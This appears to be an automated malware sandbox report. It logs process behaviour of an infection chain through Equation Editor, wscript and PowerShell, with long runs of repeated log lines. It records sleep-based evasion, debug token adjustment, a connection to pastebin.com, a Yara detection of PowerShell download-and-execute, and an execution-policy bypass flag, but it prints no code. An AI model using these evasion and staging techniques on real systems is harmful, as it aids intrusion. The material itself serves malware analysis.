Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 512	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2106	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2188	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7604	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 784	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3002	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1696	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3120	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3244	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3228	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3284	Thread sleep count: 2188 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3292	Thread sleep count: 7604 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3324	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328	Thread sleep time: -11068046444225724s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328	Thread sleep time: -1800000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524	Thread sleep count: 784 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524	Thread sleep count: 3002 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3568	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3544	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035604BC mov edx, dword ptr fs:[00000030h]

2_2_035604BC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe	Domain query: pastebin.com
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 172.67.19.24 443			Jump to behavior

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3248, type: MEMORYSTR

Bypasses PowerShell execution policy

